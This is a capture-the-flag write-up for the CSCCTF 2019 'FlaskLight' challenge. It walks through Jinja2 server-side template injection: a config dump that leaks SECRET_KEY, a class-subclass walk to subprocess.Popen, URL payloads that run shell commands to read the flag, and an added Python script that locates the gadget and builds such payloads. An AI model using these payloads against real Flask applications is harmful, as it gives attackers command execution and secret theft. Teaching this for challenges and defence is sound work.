[CSCCTF 2019 Qual] FlaskLight
Information gathering
The index page is roughly this; it gives away nothing useful.
 
Opening the developer tools (F12) reveals a clue: a search parameter.
 
Try an SSTI probe.
 
The expression is evaluated, so this is basically SSTI: the search term ends up inside the Jinja2 template source instead of being passed in as a variable.
Exploitation
config is also a global object in Flask templates; it holds every configuration value of the application, so {{ config.items() }} lists all entries. Requesting http://xxxxx//?search={{%20config.items()%20}} dumps the whole config, which gives the second clue: the SECRET_KEY value says the flag is in a directory. (Leaking SECRET_KEY is serious on its own, since it lets an attacker forge Flask session cookies, although this challenge does not need that.)
You searched for: [('JSON_AS_ASCII', True), ('USE_X_SENDFILE', False), ('SESSION_COOKIE_SECURE', False), ('SESSION_COOKIE_PATH', None), ('SESSION_COOKIE_DOMAIN', False), ('SESSION_COOKIE_NAME', 'session'), ('MAX_COOKIE_SIZE', 4093), ('SESSION_COOKIE_SAMESITE', None), ('PROPAGATE_EXCEPTIONS', None), ('ENV', 'production'), ('DEBUG', False), ('SECRET_KEY', 'CCC{f4k3_Fl49_:v} CCC{the_flag_is_this_dir}'), ('EXPLAIN_TEMPLATE_LOADING', False), ('MAX_CONTENT_LENGTH', None), ('APPLICATION_ROOT', '/'), ('SERVER_NAME', None), ('PREFERRED_URL_SCHEME', 'http'), ('JSONIFY_PRETTYPRINT_REGULAR', False), ('TESTING', False), ('PERMANENT_SESSION_LIFETIME', datetime.timedelta(31)), ('TEMPLATES_AUTO_RELOAD', None), ('TRAP_BAD_REQUEST_ERRORS', None), ('JSON_SORT_KEYS', True), ('JSONIFY_MIMETYPE', 'application/json'), ('SESSION_COOKIE_HTTPONLY', True), ('SEND_FILE_MAX_AGE_DEFAULT', datetime.timedelta(0, 43200)), ('PRESERVE_CONTEXT_ON_EXCEPTION', None), ('SESSION_REFRESH_EACH_REQUEST', True), ('TRAP_HTTP_EXCEPTIONS', False)]
Here is your result []
From another writeup I learned that {{''.__class__.__mro__[2].__subclasses__()}} dumps every loaded class. The mechanism: ''.__class__ is str, and __mro__ is its method-resolution order. The target runs Python 2 (the <type 'datetime.date'> reprs in the output below give that away), where the tuple is (str, basestring, object), so [2] is object, and object.__subclasses__() returns every class the interpreter currently has loaded, including anything the application itself imported, such as subprocess.Popen. On Python 3 the MRO is (str, object) and the index would be [1]. The index of a given class in that list depends on the Python version and on which modules are loaded, so it has to be looked up on the target rather than assumed.
The enumeration exp is likewise copied from that writeup (the script itself is not reproduced here); it prints each subclass next to its index.
Output (the listing on the page starts at index 170):
170 | <class 'jinja2.environment.Environment'>
171 | <class 'jinja2.environment.Template'>
173 | <class 'jinja2.environment.TemplateExpression'>
174 | <class 'jinja2.environment.TemplateStream'>
175 | <class 'jinja2.loaders.BaseLoader'>
176 | <type 'datetime.date'>
177 | <type 'datetime.timedelta'>
178 | <type 'datetime.time'>
179 | <type 'datetime.tzinfo'>
180 | <class 'logging.LogRecord'>
181 | <class 'logging.Formatter'>
182 | <class 'logging.BufferingFormatter'>
183 | <class 'logging.Filter'>
184 | <class 'logging.Filterer'>
185 | <class 'logging.PlaceHolder'>
186 | <class 'logging.Manager'>
187 | <class 'logging.LoggerAdapter'>
188 | <class 'werkzeug._internal._Missing'>
189 | <class 'werkzeug._internal._DictAccessorProperty'>
190 | <class 'werkzeug.utils.HTMLBuilder'>
191 | <class 'werkzeug.exceptions.Aborter'>
192 | <class 'werkzeug.urls.Href'>
193 | <type 'select.epoll'>
194 | <class 'click._compat._FixupStream'>
195 | <class 'click._compat._AtomicFile'>
196 | <class 'click.utils.LazyFile'>
197 | <class 'click.utils.KeepOpenFile'>
198 | <class 'click.utils.PacifyFlushWrapper'>
199 | <class 'click.parser.Option'>
200 | <class 'click.parser.Argument'>
201 | <class 'click.parser.ParsingState'>
202 | <class 'click.parser.OptionParser'>
203 | <class 'click.types.ParamType'>
204 | <class 'click.formatting.HelpFormatter'>
205 | <class 'click.core.Context'>
206 | <class 'click.core.BaseCommand'>
207 | <class 'click.core.Parameter'>
208 | <class 'werkzeug.serving.WSGIRequestHandler'>
209 | <class 'werkzeug.serving._SSLContext'>
210 | <class 'werkzeug.serving.BaseWSGIServer'>
211 | <class 'werkzeug.datastructures.ImmutableListMixin'>
212 | <class 'werkzeug.datastructures.ImmutableDictMixin'>
213 | <class 'werkzeug.datastructures.UpdateDictMixin'>
214 | <class 'werkzeug.datastructures.ViewItems'>
215 | <class 'werkzeug.datastructures._omd_bucket'>
216 | <class 'werkzeug.datastructures.Headers'>
217 | <class 'werkzeug.datastructures.ImmutableHeadersMixin'>
218 | <class 'werkzeug.datastructures.IfRange'>
219 | <class 'werkzeug.datastructures.Range'>
220 | <class 'werkzeug.datastructures.ContentRange'>
221 | <class 'werkzeug.datastructures.FileStorage'>
222 | <class 'email.LazyImporter'>
223 | <class 'calendar.Calendar'>
224 | <class 'werkzeug.wrappers.accept.AcceptMixin'>
225 | <class 'werkzeug.wrappers.auth.AuthorizationMixin'>
226 | <class 'werkzeug.wrappers.auth.WWWAuthenticateMixin'>
227 | <class 'werkzeug.wsgi.ClosingIterator'>
228 | <class 'werkzeug.wsgi.FileWrapper'>
229 | <class 'werkzeug.wsgi._RangeWrapper'>
230 | <class 'werkzeug.formparser.FormDataParser'>
231 | <class 'werkzeug.formparser.MultiPartParser'>
232 | <class 'werkzeug.wrappers.base_request.BaseRequest'>
233 | <class 'werkzeug.wrappers.base_response.BaseResponse'>
234 | <class 'werkzeug.wrappers.common_descriptors.CommonRequestDescriptorsMixin'>
235 | <class 'werkzeug.wrappers.common_descriptors.CommonResponseDescriptorsMixin'>
236 | <class 'werkzeug.wrappers.etag.ETagRequestMixin'>
237 | <class 'werkzeug.wrappers.etag.ETagResponseMixin'>
238 | <class 'werkzeug.wrappers.cors.CORSRequestMixin'>
239 | <class 'werkzeug.wrappers.cors.CORSResponseMixin'>
240 | <class 'werkzeug.useragents.UserAgentParser'>
241 | <class 'werkzeug.useragents.UserAgent'>
242 | <class 'werkzeug.wrappers.user_agent.UserAgentMixin'>
243 | <class 'werkzeug.wrappers.request.StreamOnlyMixin'>
244 | <class 'werkzeug.wrappers.response.ResponseStream'>
245 | <class 'werkzeug.wrappers.response.ResponseStreamMixin'>
246 | <class 'werkzeug.test._TestCookieHeaders'>
247 | <class 'werkzeug.test._TestCookieResponse'>
248 | <class 'werkzeug.test.EnvironBuilder'>
249 | <class 'werkzeug.test.Client'>
250 | <class 'uuid.UUID'>
251 | <type 'CArgObject'>
252 | <type '_ctypes.CThunkObject'>
253 | <type '_ctypes._CData'>
254 | <type '_ctypes.CField'>
255 | <type '_ctypes.DictRemover'>
256 | <class 'ctypes.CDLL'>
257 | <class 'ctypes.LibraryLoader'>
258 | <class 'subprocess.Popen'>
index of subprocess.Popen: 258
With subprocess.Popen at index 258, the final payloads are issued in order: list the current directory, list /flasklight (the directory hinted at by SECRET_KEY), then read the flag file. stdout=-1 is subprocess.PIPE, so communicate()[0] returns the command's standard output.
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
Reference
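The index 258 above is specific to that target's interpreter and loaded modules. As an added example (not code from the challenge or from the writeups cited below), the following Python 3 script performs the same MRO walk locally, locates the subprocess.Popen gadget by name instead of by a fixed index, picks the right MRO offset for the running interpreter (1 on Python 3, where the page's target needed 2), builds a payload in the same shape as the ones above, and confirms the gadget actually executes a command. It assumes, as in the challenge, that the application has already imported subprocess: a template expression cannot import modules, so the gadget only exists when the application loaded it. The command it runs to confirm the gadget is a harmless interpreter invocation chosen for this example.

```python
"""Locate the subprocess.Popen SSTI gadget by name rather than by index.

Added example; not code from the FlaskLight challenge or its writeups.
Assumption: `subprocess` is already imported in the interpreter, as it was
in the challenge. Without that import the gadget is absent from
object.__subclasses__() and the lookup below returns None.
"""
import subprocess  # ensures Popen is a loaded subclass of object
import sys


def object_mro_index() -> int:
    """Offset of `object` in str's MRO.

    Python 2: (str, basestring, object) -> 2 (what the writeup used).
    Python 3: (str, object)             -> 1.
    """
    return ''.__class__.__mro__.index(object)


def find_subclass_index(qualified_name: str):
    """Return (index, class) of the first direct subclass of `object`
    whose `module.name` equals `qualified_name`, or (None, None).

    This is the same walk as {{''.__class__.__mro__[N].__subclasses__()}},
    done locally so the index never has to be guessed or hard-coded.
    """
    for index, cls in enumerate(object.__subclasses__()):
        if "%s.%s" % (cls.__module__, cls.__name__) == qualified_name:
            return index, cls
    return None, None


def build_payload(command: str) -> str:
    """Build a payload with the writeup's shape but a discovered index.

    The Popen keyword stdout=-1 is subprocess.PIPE; communicate()[0] is the
    captured standard output, exactly as in the page's payloads.
    """
    index, _ = find_subclass_index("subprocess.Popen")
    if index is None:
        raise LookupError("subprocess.Popen is not loaded in this interpreter")
    return ("{{''.__class__.__mro__[%d].__subclasses__()[%d]"
            "(%r,shell=True,stdout=-1).communicate()[0].strip()}}"
            % (object_mro_index(), index, command))


def run_via_gadget(argv=None) -> str:
    """Confirm the gadget works: run argv through the class reached by the
    subclass walk, never naming subprocess.Popen directly.

    The default argv is a harmless self-invocation of this interpreter,
    chosen for the example so it behaves the same on any platform.
    """
    if argv is None:
        argv = [sys.executable, "-c", "print('gadget-ok')"]
    _, popen = find_subclass_index("subprocess.Popen")
    if popen is None:
        raise LookupError("subprocess.Popen is not loaded in this interpreter")
    output = popen(argv, stdout=-1).communicate()[0]
    return output.decode().strip()


if __name__ == "__main__":
    print("MRO offset of object:", object_mro_index())
    print("Popen index:", find_subclass_index("subprocess.Popen")[0])
    print("Payload:", build_payload("ls /flasklight"))
    print("Gadget check:", run_via_gadget())
```

On a real target the same lookup is done remotely: dump {{''.__class__.__mro__[N].__subclasses__()}}, search the response for subprocess.Popen, and only then fix the index in the payload. The point of searching by name is that the list order shifts whenever the Python version or the set of imported modules changes.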
Templates Injections
Practice: [CSCCTF 2019 Qual] FlaskLight
Official writeup